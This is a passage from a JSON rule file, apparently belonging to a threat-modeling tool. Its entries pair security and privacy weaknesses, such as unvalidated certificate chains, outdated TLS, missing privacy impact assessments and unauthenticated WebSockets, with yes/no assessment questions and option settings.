verification","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Is the entire certificate chain validated before trusting a certificate?","propertyID":"20b12b0e-4031-4eb3-ad39-f91489884490"},{"ID":"5670d86c-cde0-4655-880b-8c5338b97ca2","Name":"Certificate expiration","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Is there a secure and reliable way to update certificates?","propertyID":"e09bd987-fbf4-4f3d-afeb-033e5bdcb7f8"},{"ID":"5009ecdf-c775-40ff-88a4-842d4750ab8c","Name":"Revoked certificate","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Is it possible to revoke a certificate / check a certificate against a revocation list?","propertyID":"c9d634b6-7eb8-4210-9e97-58e93a5c09a0"},{"ID":"70a2fe78-06b8-4635-8c04-62d2eff0b793","Name":"Uncleared user data","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Does a factory reset remove all user data/credentials stored on the device?","propertyID":"e6ee6f25-6e52-4f43-93c4-7ef35eb97024"},{"ID":"24dbb5ec-273d-4b9d-be56-c61c06f6d907","Name":"Unhandled exceptions","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","Question":"Can unhandled exceptions occur?","propertyID":"897ef1fd-f1e7-4527-89e3-2cdaf2c8644a"},{"ID":"36e20d86-a97e-4f58-bded-6fabd6455ca2","Name":"Sensitive (error) information exposed ","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","Question":"Do error messages reveal details about the internal state (e.g. stack information, path, passwords)?","propertyID":"f7733c50-2529-459f-9397-8d06f231121c"},{"ID":"d8b6dea3-2785-47f9-8a49-f77031620844","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are configuration changes logged?","propertyID":"0bd863c2-5505-4226-9b28-bab9715c99d1"},{"ID":"3c8b59af-daec-41fc-91a2-798dba990138","Name":"Unsecure mode","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Is the security mode \'Sign\' or \'SignAndEncrypt\'?","propertyID":"4338e868-4e3c-4473-ba27-6148e8b1fc0f"},{"ID":"9e121d1d-f4da-4ca3-bc88-e4669388bf53","Name":"Missing user authentication","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Are all users authenticated (identifier \'anonymous\' is not allowed)? ","propertyID":"1e3a8fb8-4a34-44be-8168-996a7e0283f1"},{"ID":"dc941be3-a445-4474-98ff-4b19af31772c","Name":"Weak cryptographic algorithms","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Is a strong security policy chosen that uses strong cryptographic algorithms?","propertyID":"3f4c724d-3d4d-4b6b-9252-ef43b4240d79"},{"ID":"3d3eb2da-41ed-4f3d-8851-c03422948c97","Name":"Missing certificate","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Are only connections accepted that provide a trusted certificate?","propertyID":"34344cae-d072-4901-a7be-4084a2534b45"},{"ID":"bb58f761-c25c-4f98-9b41-26320247b929","Name":"Unsecure protocols","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Does the sever use secure protocols?","propertyID":"9ea829dc-59d5-437c-8d24-9908feac2941"},{"ID":"484a3974-f2e1-4535-905b-c7da674c3951","Name":"Unsecure SSL/TLS version","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Does the server use at least TLS 1.2 and older versions of SSL/TLS are disabled?","propertyID":"aa99758d-30a6-4e0f-9d11-1d46c0f43d6c"},{"ID":"a9b8f571-99ec-471e-9bf0-6144757681d9","Name":"Exposes server version","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Has the server a version banner?","propertyID":"6faf97a0-6039-4b7b-ba7c-6b9ef003ede3"},{"ID":"023c9fa3-b198-4038-9d04-17ad84d15f76","Name":"Missing patches","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Is the sever regular updated and patched?","propertyID":"defc6bcc-2bc9-457a-abab-666ec78d4f73"},{"ID":"db5fb272-c8bc-4f16-a6c9-37c80bd4225c","Name":"Missing web application firewall","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Does the system deploy a web application firewall (WAF)?","propertyID":"6f65b93f-53ad-424f-a81b-4777ad48ec97"},{"ID":"d39b86e3-5ed9-4e92-a0c6-2103aee69114","Name":"Undetected misuse of API","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Are all API calls monitored for potential API misuse?","propertyID":"b125fa52-c06e-4e54-88b5-5e9d3929f643"},{"ID":"2bf5c055-bca4-490c-90dd-5e967b925a75","Name":"Unsecure management access","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","Question":"Is the access for device management secured (unique password/certificate, MFA, etc.)?","propertyID":"6962d897-bf88-4745-9f2c-a8aa9d981f93"},{"ID":"facbd825-63f0-4a9b-b357-1035efe81c50","Name":"Unsecure message","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","Question":"Are only messages on port 8883 sent (MQTT over TLS)?","propertyID":"6d7716ae-9870-46a1-9231-a713a0dcd5a0"},{"ID":"da6c4bc6-6173-4e55-9559-296e1c52d086","Name":"Client spoofing","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","Question":"Is the client authenticated and authorized using its own X.509 certificate?","propertyID":"de628891-642c-4b7c-b88b-abf7988721dc"},{"ID":"c1284da0-cb8e-47bc-acf4-a09856baf20b","Name":"No privacy impact assessment","Description":"The PIA should address the following at minimum: identification of sensitive data stored on the device, mechanisms used to inform users of data collected; consent for data collection; processes for use and review of personal data before it is transferred, notice concerning the timing and frequency of data collection, and the ability for users to opt-in or out of data sharing.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Is a privacy impact assessment conducted?","propertyID":"8f4a0dd3-2083-42eb-89bd-48480a082342"},{"ID":"4a2dccf6-91b4-4719-b9cb-d89651045673","Name":"Outdated privacy impact assessment","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Is the privacy impact assessment regularly updated (e.g. annually)?","propertyID":"f3d756ae-7451-4738-986c-0e15d22cb2b2"},{"ID":"a0647742-dcb0-4706-9cdf-a6b969bf3e76","Name":"No safety impact assessment","Description":"Evaluate the safety impacts of an IoT system, log all safety risks, prioritize the risks, and implement mitigations for each risk. Incorporate device and environmental controls to enforce safety requirements, as necessary","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","Question":"Is a safety impact assessment conducted?","propertyID":"a1e7923f-848d-4532-b967-700925af1a77"},{"ID":"f32f6039-042f-4dc2-a8ef-ba75c463cb46","Name":"No fault tree analysis","Description":"Conduct fault tree analysis to identify and prioritize safety risks associated with the IoT system.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","Question":"Is a fault tree analysis conducted?","propertyID":"d0e4fa19-2b29-48b3-b81b-2be909af26d8"},{"ID":"dd4edd5b-398c-40d1-8d1d-239e9e63827e","Name":"No account management","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","Question":"Is there a regular audit of the account management (user, administrator, etc.)?","propertyID":"524e227d-483e-45ae-b002-3041d15fe7e9"},{"ID":"b89dd14a-9e2b-46eb-9236-92968ed70fdb","Name":"Weak authentication","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","Question":"Is certificate-based authentication used to access the system?","propertyID":"330a4f44-1471-460d-889f-4f33a3b8ce72"},{"ID":"50aceb90-7382-434f-bc25-278df0527b49","Name":"Root privileges","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Is the service running with root privileges?","propertyID":"39de06c5-7cfc-4fb8-8a1f-22a8888cf4ed"},{"ID":"da56feac-ab79-46ba-82df-b6529f907327","Name":"Certificates with long lifetime","Description":"Device certificates may be used without expiration. In this case, short-term operational certificates should be established.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is the lifetime of operational certificates no longer than 3 years?","propertyID":"40c05808-37a1-4394-a9d5-8491b55c3a9b"},{"ID":"f327dd5b-67d4-42ca-af4c-a67f70ed2c0e","Name":"No revocation process","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is there a process for certificate revocation?","propertyID":"083e93ef-da95-4064-a698-6fbd5cf997f5"},{"ID":"8278b519-37ca-4689-9ae7-8b65bf16137b","Name":"No management policy","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is there a certificate management policy (creation, processing, storage, etc.)?","propertyID":"46d35b81-19e3-404e-9fe2-af5088971ffe"},{"ID":"ca2da121-e451-497b-9c49-5126d497589d","Name":"No automated renewal process","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is there an automated process to renew certificates?","propertyID":"0c0d40fd-7f0a-412d-ae80-efce58906308"},{"ID":"884ab7b7-1449-4400-8098-eb803094dace","Name":"No incident response team","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Is there a incident response team within the organization?","propertyID":"263b5363-2c09-45dd-8ff8-1a430fb7e93a"},{"ID":"b3066f22-a08d-4b53-b75a-bc918a24d326","Name":"No supply chain risk management program","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","Question":"Is there a established supply chain risk management program?","propertyID":"7e3faca4-9b7a-4f8e-8fbe-cb461ca6870f"},{"ID":"7d1d4c4f-21e6-4042-9562-793624b85352","Name":"Risks from third party components","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","Question":"Are third party components (hardware, software) tracked, monitored, and regularly updated?","propertyID":"2614fc88-29cb-4d84-9902-5f7ca7f98410"},{"ID":"a1c43a03-c0a6-4f68-acce-f2bec5433535","Name":"No regular penetration tests","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","Question":"Are penetration tests regularly (at least annually) performed?","propertyID":"d4cb3498-4689-49f2-9f37-8bd45e62a972"},{"ID":"95c83fe6-0e68-4678-ab47-adb9e128ab28","Name":"Missing privacy measures","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Are appropriate technical and operational measures (e. g. data pseudoymisation, data minimisation) implemented?","propertyID":"2a4c8bb7-bd16-4eee-847f-25090eac2d7e"},{"ID":"8d01ce56-3aa8-449d-935d-558d34f283ba","Name":"Privacy law compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Does the system comply with all privacy laws that govern user control over their personal data?","propertyID":"1bd8c924-5f59-42db-a9b2-a4527c46adf2"},{"ID":"2b64e6da-40c0-483c-82d9-e2018f174ab5","Name":"User rights and freedoms violation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Does the system implement appropriate technical and operational measures for the protection of users rights and freedoms (e. g. transparent information, right of access, right to erasure)?","propertyID":"e79dc2a3-1af9-4a37-b649-9db68eacfc9f"},{"ID":"a6980e98-7544-4b51-b91c-9297025dbd5a","Name":"Insufficient user awareness","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Are users sufficiently aware what personal data is being exposed to the manufacturer, operator, and other partner organisations?","propertyID":"2dd7688c-eddf-4cfa-a496-8c1a46963c89"},{"ID":"93aaeb8f-1493-4904-ac3b-7f0046eb8416","Name":"Missing opt-in mechanism","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Does the system implement an opt-int mechanism to get explicit user consent for personal data processing?","propertyID":"d9b40dd2-e5eb-485d-9cf5-db2ac441c899"},{"ID":"e24d7ef1-fe5f-49a9-a2da-ebff96c0e91d","Name":"Missing SDL program","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Is a Secure Development Plan (SDL) implemented (e.g. based on ISO/IEC 27034)?","propertyID":"e1cdca4d-c2a2-48a1-be0e-93af41cd458c"},{"ID":"0157632b-3385-48b4-b168-ce7fa7a54a6e","Name":"Missing responsibility for regulatory compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Do you have a group and organization responsible for regulatory compliance of security, privacy and data protection, and safety? ","propertyID":"9db73879-4ec7-46ae-a8d9-1b555aac6954"},{"ID":"e7ff7061-d8ee-44b1-97e0-e1a0c33e0439","Name":"Missing responsibility for security compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Do you have a group responsible for security compliance and quality control?","propertyID":"f3a7b4b7-2ff8-45e8-be0e-321f8d9304a1"},{"ID":"2fa7f875-077d-40c1-8a63-e3378eb27740","Name":"Missing responsibility for auditing","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Do you have a responsible group for auditing?","propertyID":"8fda48d4-746b-4915-b0d2-55c9b68fbd99"},{"ID":"3636d9df-25b9-4fe0-85bd-f89b9de5f3ab","Name":"Missing testing","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Does your SDL program include internal functional and security testing of the system?","propertyID":"e6f155e1-51e1-4297-80d9-a6a3beef3657"},{"ID":"ef2dfbad-5621-44e0-97b3-0a0519e30e3a","Name":"Missing trusted execution environment","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the Trusted Computing Base utilize a Trusted Execution Environment for isolation of critical operations?","propertyID":"22e9ef37-20a4-4b6c-ba68-ecc90f1d152f"},{"ID":"763bd11d-5e64-4a98-b7e6-acd696199b16","Name":"Missing isolation of cryptographic operations","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Are cryptographic operations (encryption, message signing, key exchange, key storage) performed by the Trusted Computing Base?","propertyID":"28c99516-8651-452e-86f7-ce00df632c8d"},{"ID":"9dcc369c-f1a3-4d46-801a-2897376d14ed","Name":"Decryption of recorded traffic","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Is Perfect Forward Secrecy (PFS) implemented whenever possible/required?","propertyID":"6cce79b8-3df2-4eda-8892-e83b6a2ee603"},{"ID":"631e6457-1f3d-48e8-b9bb-3a0adfe1f0df","Name":"No external audit","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","Question":"Are audits regularly performed by external institutes?","propertyID":"5f7c116c-e2a5-49af-bfd6-9c38541b6a77"},{"ID":"b1270172-52a3-4da4-84bf-ce87f1d3fb69","Name":"Missing employee training and awareness","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Is there a holistic security training and awareness program for employees?","propertyID":"976c15a1-9170-4a2b-a41c-f1dfb4688b1e"},{"ID":"36c1ec42-a9cc-4599-9222-c640986517bc","Name":"No regular employee training","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Is there a continuous, regular and frequently security training for employees? ","propertyID":"f2e2201c-bd33-4dbd-a8ca-1f3a6d16eb9f"},{"ID":"13f28c81-41ca-4a71-9ee3-5e4dfc0957ca","Name":"No secure coding guidelines","Description":"Secure coding practices include, for example, input validation, output encoding, session management, and database security.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Are secure coding guidelines implemented?","propertyID":"60fadd09-661b-494a-bcac-f0a652172a50"},{"ID":"f9e03fa2-45ec-468c-9e9d-0737ab21437e","Name":"Missing end of support date","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Question":"Is there a publicly available date for the end of support?","propertyID":"ec622fb4-b851-4c4f-94dc-d5f5b1a6f85d"},{"ID":"3943ab74-ba91-4ea5-a512-955b63b04f1f","Name":"Missing update interval information","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Question":"Is a rough update interval publicly available for customers?","propertyID":"53ceef04-26a6-46a6-834d-bb9c0df2a24d"},{"ID":"327654e1-de90-4d85-aed0-76c8725763ee","Name":"Missing update notification","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Question":"If updates are not applied automatically: is there a process for notifying customers about a new update?","propertyID":"7da73f3c-b3f6-4d35-ae19-c60ed655b14c"},{"ID":"a5bb61b3-b5e1-4d10-a2ca-0bff5aed145e","Name":"Missing time synchronization","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Does the system provide the ability to synchronize the system time?","propertyID":"8643278b-1ab3-4359-9ab9-f3911bf336e6"},{"ID":"983e0974-75fe-4359-9384-52654c317b42","Name":"Message sniffing","Description":"Like HTTPS, WSS (WebSockets over SSL/TLS) is encrypted, thus protecting against man-in-the-middle attacks.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is the secure wss:// protocol used over the unsecure ws:// protocol?","propertyID":"cb908fd2-f59c-4f56-ac91-bc1192df5af0"},{"ID":"846dce78-6858-4d22-8564-6b384e07e53f","Name":"Security breach","Description":"It\u2019s relatively easy to tunnel arbitrary TCP services through a WebSocket. So you could, for example, tunnel a database connection directly through to the browser. This is very dangerous, however. Doing so would enable access to these services to an in-browser attacker in the case of a cross-site scripting attack, thus allowing an escalation of a XSS attack into a complete remote breach.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is the connection tunneled to any other service (e.g. a database)?","propertyID":"0d2c8df9-271f-42e2-b3fe-cb74719ff39b"},{"ID":"03467a8a-5fc2-4d72-b496-592985cf5a77","Name":"Missing client data validation","Description":"WebSocket connections are easily established outside of a browser, so you should assume that you need to deal with arbitrary data. Just as with any data coming from a client, you should carefully validate input before processing it.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is client data validated before processing on the server?","propertyID":"8cd86481-a82f-490d-8d62-2195981779e9"},{"ID":"13a95615-356c-438e-be7e-b1d78c4fe46c","Name":"Missing server data validation","Description":"You should apply equal suspicion to data returned from the server. Always process messages received on the client side as data. Don\u2019t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is server data validated and parsed before processing on the client?","propertyID":"92c3d3ef-aa2d-4920-978e-ff1755479308"},{"ID":"087222e9-70de-463c-8d00-b6e783f7def6","Name":"Missing authentication and authorization","Description":"The WebSocket protocol doesn\u2019t handle authorization or authentication. Practically, this means that a WebSocket opened from a page behind auth doesn\u2019t \u201cautomatically\u201d receive any sort of auth; you need to take steps to also secure the WebSocket connection.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is authentication and authorization handled separately (e.g. ticket-based)? ","propertyID":"485ff476-0c99-41de-b90a-4fdd27730685"},{"ID":"0fdc96b6-5786-4d72-bd28-3683fd6c4169","Name":"Denial of service attack","Description":"WebSockets let an unlimited number of connections reach the server. This lets an attacker flood the server with a DOS attack. This greatly strains the server and exhausts the resources on that server. Then the website slows down greatly.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is the number of connections limited?","propertyID":"9616fd88-1e3d-4d72-9178-ad81d793a744"}],"threatRuleGroups":[{"ID":"dc027a7a-9824-4b6a-befb-cc68270f2ecb","Name":"Stencil 